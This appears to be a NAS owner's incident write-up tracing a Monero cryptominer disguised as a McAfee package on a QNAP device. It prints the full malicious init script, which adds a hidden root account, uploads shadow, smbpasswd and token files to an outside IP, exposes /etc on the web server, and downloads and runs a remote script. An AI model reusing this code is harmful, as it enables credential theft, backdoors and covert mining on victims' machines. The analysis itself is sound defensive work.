TL;DR - It's mining Monero (XMR), hidden under the guise of the McAfee app. Remove it (who wants McAfee anyways?).
After a reboot, logging in over SSH and checking for active screen sessions revealed this:
[~] # screen -ls
There are screens on:
28017.MYMPNPSVR (Detached)
28014.MYMPNPSVR (Detached)
28011.MYMPNPSVR (Detached)
28008.MYMPNPSVR (Detached)
27998.QPLAYER (Detached)
27995.QNAIRP (Detached)
21664.MYTRANSCODE (Detached)
7 Sockets in /tmp/screens/S-admin.
The last 3 appear to be QNAP services (which are suspicious enough, but probably normal), but the first three are much more suspicious... Note that you can't see the content of these sessions (I should have taken a screenshot, but it's gone now), but they appeared to be XMRig (Monero mining), talking about H/s and receiving work and so on.
[~] # screen -x 28017
[screen is terminating]
[~] # screen -x 28014
[screen is terminating]
[~] # screen -x 28011
[screen is terminating]
[~] # screen -x 28008
[screen is terminating]
[~] # screen -ls
There are screens on:
27998.QPLAYER (Detached)
27995.QNAIRP (Detached)
21664.MYTRANSCODE (Detached)
3 Sockets in /tmp/screens/S-admin.
Killing them worked, but since they restart on boot more investigation is necessary. Let's check the SysVinit scripts:
[~] # ls /etc/init.d/ -lrt
total 1880
-rwxr-xr-x 1 admin administrators 16640 2017-12-29 10:00 wireless.sh*
-rwxr-xr-x 1 admin administrators 22885 2017-12-29 10:00 wireless_modules.sh*
-rwxr-xr-x 1 admin administrators 1338 2017-12-29 10:00 wireless_detect.sh*
-rwxr-xr-x 1 admin administrators 2231 2017-12-29 10:00 winbind*
-rwxr-xr-x 1 admin administrators 4507 2017-12-29 10:00 wfm_thttpd.sh*
-rwxr-xr-x 1 admin administrators 847 2017-12-29 10:00 wait_RR*
-rwxr-xr-x 1 admin administrators 5197 2017-12-29 10:00 vlan.sh*
-rwxr-xr-x 1 admin administrators 12402 2017-12-29 10:00 usb_device_check.sh*
-rwxr-xr-x 1 admin administrators 1108 2017-12-29 10:00 urandom*
-rwxr-xr-x 1 admin administrators 3859 2017-12-29 10:00 upnpd.sh*
-rwxr-xr-x 1 admin administrators 20285 2017-12-29 10:00 update.sh*
-rwxr-xr-x 1 admin administrators 326 2017-12-29 10:00 update_power.sh*
-rwxr-xr-x 1 admin administrators 36406 2017-12-29 10:00 update_img.sh*
-rwxr-xr-x 1 admin administrators 1023 2017-12-29 10:00 update_def_share.sh*
-rwxr-xr-x 1 admin administrators 8686 2017-12-29 10:00 updatedb.sh*
-rwxr-xr-x 1 admin administrators 8035 2017-12-29 10:00 unit_test.sh*
-rwxr-xr-x 1 admin administrators 14048 2017-12-29 10:00 udev_run.sh*
-rwxr-xr-x 1 admin administrators 18622 2017-12-29 10:00 twonkymedia.sh*
-rwxr-xr-x 1 admin administrators 2455 2017-12-29 10:00 timemachine.sh*
-rwxr-xr-x 1 admin administrators 2932 2017-12-29 10:00 timechange_notify.sh*
-rwxr-xr-x 1 admin administrators 21088 2017-12-29 10:00 thttpd.sh*
-rwxr-xr-x 1 admin administrators 24022 2017-12-29 10:00 sysinit.sh*
-rwxr-xr-x 1 admin administrators 2653 2017-12-29 10:00 sync_action.sh*
-rwxr-xr-x 1 admin administrators 16032 2017-12-29 10:00 stunnel.sh*
-rwxr-xr-x 1 admin administrators 32429 2017-12-29 10:00 storage_usage.sh*
-rwxr-xr-x 1 admin administrators 81 2017-12-29 10:00 startup*
-rwxr-xr-x 1 admin administrators 1128 2017-12-29 10:00 start_service.sh*
-rwxr-xr-x 1 admin administrators 13162 2017-12-29 10:00 StartMediaService.sh*
-rwxr-xr-x 1 admin administrators 2752 2017-12-29 10:00 snmp*
-rwxr-xr-x 1 admin administrators 481 2017-12-29 10:00 snapshot.sh*
-rwxr-xr-x 1 admin administrators 142449 2017-12-29 10:00 smb.sh*
-rwxr-xr-x 1 admin administrators 8249 2017-12-29 10:00 smb2_protocol.sh*
-rwxr-xr-x 1 admin administrators 2122 2017-12-29 10:00 skylink-updater.sh*
-rwxr-xr-x 1 admin administrators 14652 2017-12-29 10:00 shutdown_check.sh*
-rwxr-xr-x 1 admin administrators 22649 2017-12-29 10:00 set_mtu.sh*
-rwxr-xr-x 1 admin administrators 15580 2017-12-29 10:00 set_led.sh*
-rwxr-xr-x 1 admin administrators 8365 2017-12-29 10:00 services.sh*
-rwxr-xr-x 1 admin administrators 2800 2017-12-29 10:00 selfhost-updater.sh*
-rwxr-xr-x 1 admin administrators 21189 2017-12-29 10:00 scan_wifi_ups.sh*
-rwxr-xr-x 1 admin administrators 5457 2017-12-29 10:00 s3_callback.sh*
-rwxr-xr-x 1 admin administrators 234 2017-12-29 10:00 runone.sh*
-rwxr-xr-x 1 admin administrators 3404 2017-12-29 10:00 rsyslog.sh*
-rwxr-xr-x 1 admin administrators 5629 2017-12-29 10:00 rsyncSpeedTest.sh*
-rwxr-xr-x 1 admin administrators 1963 2017-12-29 10:00 rsyncd.sh*
-rwxr-xr-x 1 admin administrators 1825 2017-12-29 10:00 reset_sata.sh*
-rwxr-xr-x 1 admin administrators 3640 2017-12-29 10:00 remote_folder_mount.sh*
-rwxr-xr-x 1 admin administrators 1169 2017-12-29 10:00 refresh_nvr_crontab.sh*
-rwxr-xr-x 1 admin administrators 966 2017-12-29 10:00 refresh_internet_status.sh*
-rwxr-xr-x 1 admin administrators 5751 2017-12-29 10:00 recycled.sh*
-rwxr-xr-x 1 admin administrators 535 2017-12-29 10:00 recoverd.sh*
-rwxr-xr-x 1 admin administrators 785 2017-12-29 10:00 reboot*
-rwxr-xr-x 1 admin administrators 461 2017-12-29 10:00 rcv_port.sh*
-rwxr-xr-x 1 admin administrators 7101 2017-12-29 10:00 rcS_normal*
-rwxr-xr-x 1 admin administrators 320 2017-12-29 10:00 rcS*
-rwxr-xr-x 1 admin administrators 5794 2017-12-29 10:00 rcK*
-rwxr-xr-x 1 admin administrators 4909 2017-12-29 10:00 radvd.sh*
-rwxr-xr-x 1 admin administrators 1520 2017-12-29 10:00 radius.sh*
-rwxr-xr-x 1 admin administrators 1315 2017-12-29 10:00 qts_notice.sh*
-rwxr-xr-x 1 admin administrators 62432 2017-12-29 10:00 Qthttpd.sh*
-rwxr-xr-x 1 admin administrators 1648 2017-12-29 10:00 qtag.sh*
-rwxr-xr-x 1 admin administrators 2941 2017-12-29 10:00 qsyncsrv_install.sh*
-rwxr-xr-x 1 admin administrators 4893 2017-12-29 10:00 qsyncman.sh*
-rwxr-xr-x 1 admin administrators 153 2017-12-29 10:00 qraid1.sh*
-rwxr-xr-x 1 admin administrators 550 2017-12-29 10:00 qplayd.sh*
-rwxr-xr-x 1 admin administrators 19176 2017-12-29 10:00 QMediaService.sh*
-rwxr-xr-x 1 admin administrators 2486 2017-12-29 10:00 qaccess.sh*
-rwxr-xr-x 1 admin administrators 610 2017-12-29 10:00 pw_sleep.sh*
-rwxr-xr-x 1 admin administrators 1197 2017-12-29 10:00 printer.sh*
-rwxr-xr-x 1 admin administrators 489 2017-12-29 10:00 poweroff*
-rwxr-xr-x 1 admin administrators 1665 2017-12-29 10:00 power_button.sh*
-rwxr-xr-x 1 admin administrators 54 2017-12-29 10:00 pd_detach*
-rwxr-xr-x 1 admin administrators 400 2017-12-29 10:00 pd_attach*
-rwxr-xr-x 1 admin administrators 2671 2017-12-29 10:00 oray-updater.sh*
-rwxr-xr-x 1 admin administrators 2841 2017-12-29 10:00 opentftp.sh*
-rwxr-xr-x 1 admin administrators 1219 2017-12-29 10:00 openssl_signature.sh*
-rwxr-xr-x 1 admin administrators 17588 2017-12-29 10:00 nvr_svc.sh*
-rwxr-xr-x 1 admin administrators 10749 2017-12-29 10:00 nvrd.sh*
-rwxr-xr-x 1 admin administrators 4383 2017-12-29 10:00 ntpf.sh*
-rwxr-xr-x 1 admin administrators 3992 2017-12-29 10:00 nsswitch.sh*
-rwxr-xr-x 1 admin administrators 69 2017-12-29 10:00 nss2_dusg.sh*
-rwxr-xr-x 1 admin administrators 496 2017-12-29 10:00 nsed.sh*
-rwxr-xr-x 1 admin administrators 2423 2017-12-29 10:00 noshareservices.sh*
-rwxr-xr-x 1 admin administrators 17985 2017-12-29 10:00 nfs*
-rwxr-xr-x 1 admin administrators 90813 2017-12-29 10:00 network.sh*
-rwxr-xr-x 1 admin administrators 8757 2017-12-29 10:00 mtp_run_hal.sh*
-rwxr-xr-x 1 admin administrators 12861 2017-12-29 10:00 mountall*
-rwxr-xr-x 1 admin administrators 436 2017-12-29 10:00 mkchangepwd.sh*
-rwxr-xr-x 1 admin administrators 975 2017-12-29 10:00 mariadb.sh*
-rwxr-xr-x 1 admin administrators 1086 2017-12-29 10:00 lunportman.sh*
-rwxr-xr-x 1 admin administrators 309 2017-12-29 10:00 log_rotation.sh*
-rwxr-xr-x 1 admin administrators 5968 2017-12-29 10:00 login.sh*
-rwxr-xr-x 1 admin administrators 3862 2017-12-29 10:00 load_lan_module.sh*
-rwxr-xr-x 1 admin administrators 1412 2017-12-29 10:00 ldap.sh*
-rwxr-xr-x 1 admin administrators 5319 2017-12-29 10:00 ldap_server.sh*
-rwxr-xr-x 1 admin administrators 3018 2017-12-29 10:00 ldap_backup_db.sh*
-rwxr-xr-x 1 admin administrators 5966 2017-12-29 10:00 lan_card_test.sh*
-rwxr-xr-x 1 admin administrators 1823 2017-12-29 10:00 klogd.sh*
-rwxr-xr-x 1 admin administrators 3349 2017-12-29 10:00 killnas.sh*
-rwxr-xr-x 1 admin administrators 1961 2017-12-29 10:00 kdebug.sh*
-rwxr-xr-x 1 admin administrators 3588 2017-12-29 10:00 iso_mount.sh*
-rwxr-xr-x 1 admin administrators 4020 2017-12-29 10:00 iscsiinit.sh*
-rwxr-xr-x 1 admin administrators 10123 2017-12-29 10:00 ipv6.sh*
-rwxr-xr-x 1 admin administrators 904 2017-12-29 10:00 ipmi_check*
-rwxr-xr-x 1 admin administrators 10219 2017-12-29 10:00 ipchange_notify.sh*
-rwxr-xr-x 1 admin administrators 30321 2017-12-29 10:00 installtgz.sh*
-rwxr-xr-x 1 admin administrators 7945 2017-12-29 10:00 init_qpkg.sh*
-rwxr-xr-x 1 admin administrators 251 2017-12-29 10:00 init_network.sh*
-rwxr-xr-x 1 admin administrators 26660 2017-12-29 10:00 init_nas.sh*
-rwxr-xr-x 1 admin administrators 9032 2017-12-29 10:00 init_mac_addr.sh*
-rwxr-xr-x 1 admin administrators 485 2017-12-29 10:00 init_lvm.sh*
-rwxr-xr-x 1 admin administrators 5555 2017-12-29 10:00 init_iTune.sh*
-rwxr-xr-x 1 admin administrators 14987 2017-12-29 10:00 init_hardware.sh*
-rwxr-xr-x 1 admin administrators 20193 2017-12-29 10:00 init_final.sh*
-rwxr-xr-x 1 admin administrators 1785 2017-12-29 10:00 init_dns_type.sh*
-rwxr-xr-x 1 admin administrators 25764 2017-12-29 10:00 init_disk.sh*
-rwxr-xr-x 1 admin administrators 46095 2017-12-29 10:00 init_check.sh*
-rwxr-xr-x 1 admin administrators 204 2017-12-29 10:00 init_acl.sh*
-rwxr-xr-x 1 admin administrators 1522 2017-12-29 10:00 idmap.sh*
-rwxr-xr-x 1 admin administrators 3955 2017-12-29 10:00 hostname.sh*
-rwxr-xr-x 1 admin administrators 1160 2017-12-29 10:00 getmac.sh*
-rwxr-xr-x 1 admin administrators 1552 2017-12-29 10:00 get_external_ip.sh*
-rwxr-xr-x 1 admin administrators 5236 2017-12-29 10:00 genLanglist.sh*
-rwxr-xr-x 1 admin administrators 1043 2017-12-29 10:00 gen_issue.sh*
-rwxr-xr-x 1 admin administrators 335 2017-12-29 10:00 gen_hd_info.sh*
-rwxr-xr-x 1 admin administrators 7003 2017-12-29 10:00 functions*
-rwxr-xr-x 1 admin administrators 668 2017-12-29 10:00 enc_share.sh*
-rwxr-xr-x 1 admin administrators 1655 2017-12-29 10:00 dhcpd.sh*
-rwxr-xr-x 1 admin administrators 1502 2017-12-29 10:00 dbus.sh*
-rwxr-xr-x 1 admin administrators 2168 2017-12-29 10:00 dav_mount.sh*
-rwxr-xr-x 1 admin administrators 3706 2017-12-29 10:00 cupsd.sh*
-rwxr-xr-x 1 admin administrators 4533 2017-12-29 10:00 crond.sh*
-rwxr-xr-x 1 admin administrators 14358 2017-12-29 10:00 create_udev_rule.sh*
-rwxr-xr-x 1 admin administrators 1351 2017-12-29 10:00 chkcfgpart.sh*
-rwxr-xr-x 1 admin administrators 3759 2017-12-29 10:00 check_service_noshare_run*
-rwxr-xr-x 1 admin administrators 603 2017-12-29 10:00 check_nss2*
-rwxr-xr-x 1 admin administrators 30 2017-12-29 10:00 _check_nss2*
-rwxr-xr-x 1 admin administrators 4881 2017-12-29 10:00 check_lan_port.sh*
-rwxr-xr-x 1 admin administrators 2743 2017-12-29 10:00 check_ddns_external_ip.sh*
-rwxr-xr-x 1 admin administrators 1514 2017-12-29 10:00 check_bootcmd.sh*
-rwxr-xr-x 1 admin administrators 7733 2017-12-29 10:00 cdrom.sh*
-rwxr-xr-x 1 admin administrators 496 2017-12-29 10:00 cacd.sh*
-rwxr-xr-x 1 admin administrators 78 2017-12-29 10:00 boot_done.sh*
-rwxr-xr-x 1 admin administrators 7113 2017-12-29 10:00 bluetooth.sh*
-rwxr-xr-x 1 admin administrators 2480 2017-12-29 10:00 backup_conf.sh*
-rwxr-xr-x 1 admin administrators 4247 2017-12-29 10:00 atalk.sh*
-rwxr-xr-x 1 admin administrators 45713 2017-12-29 10:00 antivirus.sh*
-rwxr-xr-x 1 admin administrators 703 2017-12-29 10:00 ads_register_dns.sh*
-rwxr-xr-x 1 admin administrators 1059 2017-12-29 10:00 adjust_sync_speed.sh*
-rwxr-xr-x 1 admin administrators 361 2017-12-29 10:00 addshare.sh*
-rwxr-xr-x 1 admin administrators 10749 2017-12-29 15:31 nvrd.sh_bak*
-rwxr-xr-x 1 admin administrators 17723 2017-12-29 16:00 tfan_auto_testing.sh*
-rwxr-xr-x 1 admin administrators 655 2017-12-29 16:00 qcloud_init.sh*
-rwxr-xr-x 1 admin administrators 1707 2017-12-29 16:00 qcloud_check*
-rwxr-xr-x 1 admin administrators 936 2017-12-29 16:00 qcloud_blob_daemon.sh*
-rwxr-xr-x 1 admin administrators 288 2017-12-29 16:00 qanalytic_init.sh*
-rwxr-xr-x 1 admin administrators 787 2017-12-29 16:00 push_notification_daemon.sh*
-rwxr-xr-x 1 admin administrators 2420 2017-12-29 16:00 porter.sh*
-rwxr-xr-x 1 admin administrators 547 2017-12-29 16:00 cloudinstall_report_complete_daemon.sh*
-rwxr-xr-x 1 admin administrators 765 2017-12-29 16:00 cloudinstall_init.sh*
-rwxr-xr-x 1 admin administrators 4470 2017-12-29 16:00 cloudinstall_init_daemon.sh*
-rwxr-xr-x 1 admin administrators 653 2017-12-29 16:00 cloudinstall_finish.sh*
-rw-r--r-- 1 admin administrators 9802 2017-12-29 16:01 genpowerfail.sh
-rwxr-xr-x 1 admin administrators 33479 2017-12-29 16:23 avahi.sh*
-rwxr-xr-x 1 admin administrators 1076 2017-12-29 16:29 reset_all.sh*
-rwxr-xr-x 1 admin administrators 1564 2017-12-29 16:29 photo_scand.sh*
-rwxr-xr-x 1 admin administrators 3463 2017-12-29 16:29 ntpd.sh*
-rwxr-xr-x 1 admin administrators 640 2017-12-29 16:29 ntpclient.sh*
-rwxr-xr-x 1 admin administrators 43292 2017-12-29 16:29 ImRd.sh*
-rwxr-xr-x 1 admin administrators 571 2017-12-29 16:29 sdmd.sh*
-rwxr-xr-x 1 admin administrators 701 2017-12-29 16:29 qbutton.sh*
-rwxr-xr-x 1 admin administrators 3069 2017-12-29 16:29 iscsitrgt.sh*
-rwxr-xr-x 1 admin administrators 52 2017-12-29 16:29 init_platform.sh*
-rwxr-xr-x 1 admin administrators 2130 2017-12-29 16:29 init_gpu.sh*
-rwxr-xr-x 1 admin administrators 1509 2017-12-29 16:29 fbdisk.sh*
-rwxr-xr-x 1 admin administrators 13280 2017-12-29 16:49 mysqld.sh*
-rwxr-xr-x 1 admin administrators 29407 2017-12-29 16:50 rsyncRR.sh*
-rwxr-xr-x 1 admin administrators 1528 2017-12-29 16:50 rsyncd_srv.sh*
-rwxr-xr-x 1 admin administrators 2390 2017-12-29 16:50 logo.sh*
-rwxr-xr-x 1 admin administrators 275 2017-12-29 16:50 install.sh*
-rwxr-xr-x 1 admin administrators 6272 2017-12-29 16:51 usb_ups.sh*
-rwxr-xr-x 1 admin administrators 1309 2017-12-29 16:51 snmp_ups.sh*
-rwxr-xr-x 1 admin administrators 3098 2017-12-29 16:51 ftp.sh*
-rwxr-xr-x 1 admin administrators 391 2017-12-29 16:51 ddns_update.sh*
-rwxr-xr-x 1 admin administrators 6455 2017-12-29 16:51 ddns_update_for_cgi.sh*
-rwxr-xr-x 1 admin administrators 1012 2017-12-29 16:51 ups.sh*
lrwxrwxrwx 1 admin administrators 8 2018-02-08 00:42 bonjour.sh -> avahi.sh*
lrwxrwxrwx 1 admin administrators 44 2018-02-08 00:42 mtp_run.sh -> /mnt/ext/opt/mtpBinary/etc/init.d/mtp_run.sh*
lrwxrwxrwx 1 admin administrators 72 2018-02-08 00:43 QNAP_Diagnostic_Tool.sh -> /share/CACHEDEV1_DATA/.qpkg/QNAP_Diagnostic_Tool/QNAP_Diagnostic_Tool.sh*
lrwxrwxrwx 1 admin administrators 53 2018-02-08 00:43 nvrec.sh -> /share/CACHEDEV1_DATA/.qpkg/StorageExpansion/nvrec.sh*
lrwxrwxrwx 1 admin administrators 44 2018-02-08 00:43 McAfee.sh -> /share/CACHEDEV1_DATA/.qpkg/McAfee/McAfee.sh*
lrwxrwxrwx 1 admin administrators 40 2018-02-08 00:43 qpkg_res.sh -> /mnt/ext/opt/ResourceMonitor/qpkg_res.sh*
lrwxrwxrwx 1 admin administrators 45 2018-02-08 00:44 helpdesk.sh -> /mnt/HDA_ROOT/update_pkg/helpdesk/helpdesk.sh*
lrwxrwxrwx 1 admin administrators 29 2018-02-08 00:44 qboost.sh -> /mnt/ext/opt/Qboost/qboost.sh*
lrwxrwxrwx 1 admin administrators 57 2018-02-08 00:44 QcloudSSLCertificate.sh -> /mnt/ext/opt/QcloudSSLCertificate/QcloudSSLCertificate.sh*
lrwxrwxrwx 1 admin administrators 51 2018-02-08 00:46 qsyncsrv.sh -> /share/CACHEDEV1_DATA/.qpkg/QsyncServer/qsyncsrv.sh*
lrwxrwxrwx 1 admin administrators 53 2018-02-08 00:46 qsyncsrv_c.sh -> /share/CACHEDEV1_DATA/.qpkg/QsyncServer/qsyncsrv_c.sh*
lrwxrwxrwx 1 admin administrators 51 2018-02-08 00:46 versiond.sh -> /share/CACHEDEV1_DATA/.qpkg/QsyncServer/versiond.sh*
Nothing immediately jumps out, but what if we check the scripts for screen calls?
[~] # for f in /etc/init.d/*; do cat $f | grep screen; done
/screen/ALSADaemon &
/screen/animation &
/usr/sbin/screen -dmS QNAIRP /usr/bin/ntpd
/usr/sbin/screen -dmS QPLAYER /usr/bin/qsyncsman
/usr/sbin/screen -dmS MYMPNPSVR /usr/bin/McAfeeDisk -c /usr/bin/mscaner.b
/usr/sbin/screen -dmS MYMPNPSVR /usr/bin/McAfeeDisk -c /usr/bin/mscaner.bb
/usr/sbin/screen -dmS MYMPNPSVR /usr/bin/McAfee -c /usr/bin/mscaner.a
/usr/sbin/screen -dmS MYMPNPSVR /usr/bin/McAfee -c /usr/bin/mscaner.aa
/usr/sbin/screen -dmS MYMPNPSVR /usr/bin/McAfee -c /usr/bin/mscaner.n
/usr/sbin/screen -dmS MYMPNPSVR /usr/bin/McAfee -c /usr/bin/mscaner.nn
/usr/sbin/screen -dmS MYMPNPSVR /usr/bin/McAfee -c /usr/bin/mscaner.x
/usr/sbin/screen -dmS MYMPNPSVR /usr/bin/McAfee -c /usr/bin/mscaner.xx
/usr/sbin/screen -dmS LUNF /bin/sh /tmp/lun.sh
/sbin/daemon_mgr mytranscodesvr start "TERMINFO='/usr/share/terminfo/' LANG='en_US.UTF-8' /usr/sbin/screen -dmS 'MYTRANSCODE' $PACKAGE_PATH/bin/mytranscodesvr $TRANSCODE_PARAMS"
TERMINFO="/usr/share/terminfo/" LANG="en_US.UTF-8" /usr/sbin/screen -dmS 'QAIRP' /mnt/ext/opt/apache/bin/php /usr/local/medialibrary/bin/QAirplay/svc.php
There's something there! But where?
[~] # for f in /etc/init.d/*; do if $(cat $f | grep screen); then echo $f; fi; done
-sh: /screen/ALSADaemon: No such file or directory
/etc/init.d/McAfee.sh
[usage]: daemon_mgr [name] [action] [daemon]
[name]: name of daemon
[action]: "start" or "stop" or "nolog" or "ignore"
[daemon]: the execute file of daemon
[ex]: daemon_mgr thttpd start "/usr/local/sbin/thttpd -nor -nos -u root -l /var/log/thttpd.log -d /home/httpd -c '**.*' &"
/etc/init.d/QMediaService.sh
Is McAfee the culprit?
[~] # cat /etc/init.d/McAfee.sh
#!/bin/sh
CONF=/etc/config/qpkg.conf
QPKG_NAME="McAfee"
QPKG_ROOT=`/sbin/getcfg $QPKG_NAME Install_Path -f ${CONF}`
case "$1" in
start)
Lcheck=`/bin/grep аdmіn /etc/config/shadow`
if [ -n "$Lcheck" ]
then
echo "1"
else
echo "0"
echo 'аdmіn:$1$$L6f64ThMmMKGYXuq5BYmu.:14233:0:99999:7:::' >> /etc/shadow
echo 'аdmіn:x:0:0:administrator:/share/homes/admin:/bin/sh' >> /etc/passwd
fi
ipq=$(/sbin/curl http://ident.me)
curl -F "ip=$ipq" -F "aekuyf=@/etc/config/shadow" http://109.95.47.67:45865/qktrmfkty0932567dsahjgyutruyew78324/qwedsjhf.php
curl -F "ip=$ipq" -F "aekuyf=@/etc/config/smbpasswd" http://109.95.47.67:45865/qktrmfkty0932567dsahjgyutruyew78324/qwedsjhf.php
curl -F "ip=$ipq" -F "aekuyf=@/etc/config/.qos_config/users/admin/.qtoken" http://109.95.47.67:45865/qktrmfkty0932567dsahjgyutruyew78324/qwedsjhf.php
curl -F "ip=$ipq" -F "aekuyf=@/etc/config/uLinux.conf" http://109.95.47.67:45865/qktrmfkty0932567dsahjgyutruyew78324/qwedsjhf.php
chmod +x ${QPKG_ROOT}/McAfee
chmod +x ${QPKG_ROOT}/ntpd
chmod +x ${QPKG_ROOT}/qsyncsman
chmod +x ${QPKG_ROOT}/McAfeeDisk
/bin/ln -sf /etc/ /home/httpd/bfmfzyxqh7h38emut3kw
mkdir /etc/config/.qos_config/users/
mkdir /etc/config/.qos_config/users/admin
echo -e "1:1:qper098" > /etc/config/.qos_config/users/admin/.qtoken
[ -f /usr/bin/McAfee ] || /bin/ln -sf ${QPKG_ROOT}/McAfee /usr/bin/McAfee
[ -f /usr/bin/McAfeeDisk ] || /bin/ln -sf ${QPKG_ROOT}/McAfeeDisk /usr/bin/McAfeeDisk
[ -f /usr/bin/mscaner.a ] || /bin/ln -sf ${QPKG_ROOT}/mscaner.a /usr/bin/mscaner.a
[ -f /usr/bin/mscaner.aa ] || /bin/ln -sf ${QPKG_ROOT}/mscaner.aa /usr/bin/mscaner.aa
[ -f /usr/bin/mscaner.b ] || /bin/ln -sf ${QPKG_ROOT}/mscaner.b /usr/bin/mscaner.b
[ -f /usr/bin/mscaner.bb ] || /bin/ln -sf ${QPKG_ROOT}/mscaner.bb /usr/bin/mscaner.bb
[ -f /usr/bin/mscaner.n ] || /bin/ln -sf ${QPKG_ROOT}/mscaner.n /usr/bin/mscaner.n
[ -f /usr/bin/mscaner.nn ] || /bin/ln -sf ${QPKG_ROOT}/mscaner.nn /usr/bin/mscaner.nn
[ -f /usr/bin/mscaner.x ] || /bin/ln -sf ${QPKG_ROOT}/mscaner.x /usr/bin/mscaner.x
[ -f /usr/bin/mscaner.xx ] || /bin/ln -sf ${QPKG_ROOT}/mscaner.xx /usr/bin/mscaner.xx
[ -f /usr/bin/ntpd ] || /bin/ln -sf ${QPKG_ROOT}/ntpd /usr/bin/ntpd
[ -f /usr/bin/qsyncsman ] || /bin/ln -sf ${QPKG_ROOT}/qsyncsman /usr/bin/qsyncsman
/usr/bin/killall McAfee
/usr/bin/killall McAfeeDisk
/usr/bin/killall -9 ntpd
/usr/bin/killall -9 qsyncsman
/usr/sbin/screen -dmS QNAIRP /usr/bin/ntpd
/usr/sbin/screen -dmS QPLAYER /usr/bin/qsyncsman
check_aes=`/bin/grep aes /proc/cpuinfo`
/usr/sbin/screen -dmS MYMPNPSVR /usr/bin/McAfeeDisk -c /usr/bin/mscaner.b
/usr/sbin/screen -dmS MYMPNPSVR /usr/bin/McAfeeDisk -c /usr/bin/mscaner.bb
if [ -n "$check_aes" ]
then
/usr/sbin/screen -dmS MYMPNPSVR /usr/bin/McAfee -c /usr/bin/mscaner.a
/usr/sbin/screen -dmS MYMPNPSVR /usr/bin/McAfee -c /usr/bin/mscaner.aa
else
/usr/sbin/screen -dmS MYMPNPSVR /usr/bin/McAfee -c /usr/bin/mscaner.n
/usr/sbin/screen -dmS MYMPNPSVR /usr/bin/McAfee -c /usr/bin/mscaner.nn
fi
/usr/sbin/screen -dmS MYMPNPSVR /usr/bin/McAfee -c /usr/bin/mscaner.x
/usr/sbin/screen -dmS MYMPNPSVR /usr/bin/McAfee -c /usr/bin/mscaner.xx
MCcheck=`ps | grep "McAfee" | wc -l`
if (($MCcheck > 1))
then
echo "1"
chk=$(/bin/ps 2>&1)
curl --data "ip=$ipq" --data "$chk" http://109.95.47.67:45865/qktrmfkty0932567dsahjgyutruyew78324/fgdretres.php
else
chk=$(/usr/bin/McAfee -V 2>&1)
curl --data "ip=$ipq" --data "$chk" http://109.95.47.67:45865/qktrmfkty0932567dsahjgyutruyew78324/asyteruygjh.php
echo "0"
fi
/usr/bin/wget -O /tmp/lun.sh http://109.95.47.67:45865/qktrmfkty0932567dsahjgyutruyew78324/fdsfds54.php
/usr/sbin/screen -dmS LUNF /bin/sh /tmp/lun.sh
rm /tmp/lun.sh
: ADD START ACTIONS HERE
;;
stop)
: ADD STOP ACTIONS HERE
;;
restart)
$0 stop
$0 start
;;
*)
echo "Usage: $0 {start|stop|restart}"
exit 1
esac
exit 0
That script sure looks kind of weird. What happens if we run one of those commands?
[~] # ls /usr/bin/McAfee
/usr/bin/McAfee@
[~] # ls /usr/bin/McAfee -l
lrwxrwxrwx 1 admin administrators 41 2018-02-08 00:45 /usr/bin/McAfee -> /share/CACHEDEV1_DATA/.qpkg/McAfee/McAfee*
[~] # ls /share/CACHEDEV1_DATA/.qpkg/
autorun@ helpdesk/ McAfee/ QNAP_Diagnostic_Tool/ QsyncServer/ StorageExpansion/
[~] # ls /share/CACHEDEV1_DATA/.qpkg/McAfee/
McAfee* McAfeeDisk* McAfee.sh* mscaner.a mscaner.aa mscaner.b mscaner.bb mscaner.n mscaner.nn mscaner.x mscaner.xx ntpd* qsyncsman*
[~] # /usr/sbin/screen -dmS MYMPNPSVR /usr/bin/McAfee -c /usr/bin/mscaner.a
[~] # screen -ls
There are screens on:
5482.MYMPNPSVR (Detached)
4287.QNAIRP (Detached)
27998.QPLAYER (Detached)
27995.QNAIRP (Detached)
21664.MYTRANSCODE (Detached)
5 Sockets in /tmp/screens/S-admin.
[~] # screen -x 5482
[screen is terminating]
Again you can't see it, but this confirmed that this is indeed what is starting the mining. But why? Isn't this an antivirus program?? Let's dig a little further into the package directory...
[~] # ls -l /usr/bin/McAfee
lrwxrwxrwx 1 admin administrators 41 2018-02-08 00:45 /usr/bin/McAfee -> /share/CACHEDEV1_DATA/.qpkg/McAfee/McAfee*
[~] # ls -lrta /share/CACHEDEV1_DATA/.qpkg/McAfee/
total 4500
-rw-r--r-- 1 admin administrators 3769 2017-08-08 21:07 .qpkg_icon_gray.gif
-rw-r--r-- 1 admin administrators 7958 2017-08-08 21:07 .qpkg_icon.gif
-rw-r--r-- 1 admin administrators 7958 2017-08-08 21:07 .qpkg_icon_80.gif
-rw-r--r-- 1 admin administrators 529 2018-01-25 14:17 mscaner.aa
-rw-r--r-- 1 admin administrators 529 2018-01-25 14:18 mscaner.n
-rw-r--r-- 1 admin administrators 529 2018-01-25 14:18 mscaner.a
-rw-r--r-- 1 admin administrators 529 2018-01-25 14:19 mscaner.nn
-rw-r--r-- 1 admin administrators 534 2018-01-25 14:20 mscaner.x
-rw-r--r-- 1 admin administrators 534 2018-01-25 14:21 mscaner.xx
-rw-r--r-- 1 admin administrators 529 2018-01-25 14:22 mscaner.bb
-rw-r--r-- 1 admin administrators 529 2018-01-25 14:22 mscaner.b
-rwxrwxr-x 1 admin administrators 1174680 2018-01-25 16:16 McAfeeDisk*
-rwxrwxr-x 1 admin administrators 526432 2018-02-02 08:36 McAfee*
-rwxrwxr-x 1 admin administrators 1460052 2018-02-04 09:41 ntpd*
-rwxrwxr-x 1 admin administrators 1361200 2018-02-04 10:56 qsyncsman*
-rwxr-xr-x 1 admin administrators 4426 2018-02-04 18:29 McAfee.sh*
-rw-r--r-- 1 admin administrators 215 2018-02-04 20:08 .list
drwxr-xr-x 2 admin administrators 4096 2018-02-04 20:08 ./
-rwxr-xr-x 1 admin administrators 780 2018-02-04 20:08 .uninstall.sh*
drwxrwxrwx 8 admin administrators 4096 2018-02-08 00:46 ../
[~] # cd /share/CACHEDEV1_DATA/.qpkg/McAfee/
[/share/CACHEDEV1_DATA/.qpkg/McAfee] #
[/share/CACHEDEV1_DATA/.qpkg/McAfee] #
[/share/CACHEDEV1_DATA/.qpkg/McAfee] #
[/share/CACHEDEV1_DATA/.qpkg/McAfee] # ls
McAfee* McAfeeDisk* McAfee.sh* mscaner.a mscaner.aa mscaner.b mscaner.bb mscaner.n mscaner.nn mscaner.x mscaner.xx ntpd* qsyncsman*
[/share/CACHEDEV1_DATA/.qpkg/McAfee] #
[/share/CACHEDEV1_DATA/.qpkg/McAfee] #
[/share/CACHEDEV1_DATA/.qpkg/McAfee] #
[/share/CACHEDEV1_DATA/.qpkg/McAfee] #
